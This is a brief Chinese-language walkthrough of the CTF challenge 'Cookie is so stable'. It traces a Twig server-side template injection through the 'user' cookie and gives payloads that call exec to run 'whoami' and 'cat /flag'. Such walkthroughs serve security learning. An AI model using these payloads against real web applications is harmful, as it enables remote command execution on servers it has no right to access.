[BJDCTF2020]Cookie is so stable 1

 

 

 

进入页面看见 flag和hint

点击flag就看到了输入框，tell me 你是谁

点击hint 查看源码

 

 

 根据提示，cookie处可能存在问题

在输入框随便输入个名字，然后抓包看看cookie

 

 

 

 

 

 

 

 

 看到cookie里user参数，可疑点SSTI注入，放包然后看浏览器页面；

 

 

 

点击注销，然后直接输入 测试代码

{{7+8}}        不抓包直接提交

 

 

 

哦了，构造payload吧

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}                就是在登录的情况下刷新页面抓包，再把user的内容改了

 

 

 

拿flag

user={{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}